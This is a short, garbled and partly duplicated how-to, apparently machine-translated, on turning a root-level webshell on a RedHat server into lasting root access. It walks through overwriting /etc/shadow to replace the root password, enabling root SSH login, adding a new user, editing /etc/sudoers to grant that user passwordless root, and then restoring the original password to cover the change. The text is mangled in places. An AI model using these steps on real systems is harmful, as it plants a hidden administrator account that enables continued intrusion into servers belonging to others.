One day, the webshell and redhat system of a website are obtained. Tomcat programs are started as root, and webshell also has root permissions. 1. webshell directly replace the root password: etcshadow remember to back up 2. allow root login via ssh: etcsshsshd_configPermitRootLoginyes # allow root login 3. Restart the ssh service ser
Get a website webshell, rEdHat system,McThe at program is started as root, and webshell also has root permissions.
1. Replace the root password with webshell:/etc/shadow // remember to back up
2. allow root users to log on via ssh:/etc/ssh/sshd_config
PeRmItRootLogin yes # Allow root Login
3. restart the ssh service ssh restart
4. log on to ssh as root and add a user
UseraDdAppliCatIon
Passwd// Set the password as prompted
5. Change the application user to runSuNo Password required
Chmod+ W/etc/sudoers // Add write permission, read-only by default
Modify/etc/sudoers
Vi/etc/sudoers
Add application ALL = (ALL) NOPASSWD: ALL
6. Change the root password back to its original state and prohibit root login. Finished